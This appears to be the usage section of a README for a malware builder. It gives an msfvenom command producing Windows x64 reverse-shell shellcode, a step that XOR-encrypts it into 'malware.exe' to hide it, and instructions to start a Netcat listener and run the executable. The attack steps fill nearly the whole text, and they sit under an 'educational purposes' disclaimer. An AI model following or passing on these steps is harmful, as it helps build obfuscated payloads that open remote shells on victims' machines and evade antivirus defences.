Run this command to generate the shellcode via Msfvenom.
msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4455 -f raw -o payload.binRun this command to encrypt the generated shellcode and generate malware.exe.
python3 xorencrypt.py- Run the listener (such as Netcat tool)
- Run
malware.exe
Everything is strictly for educational purposes!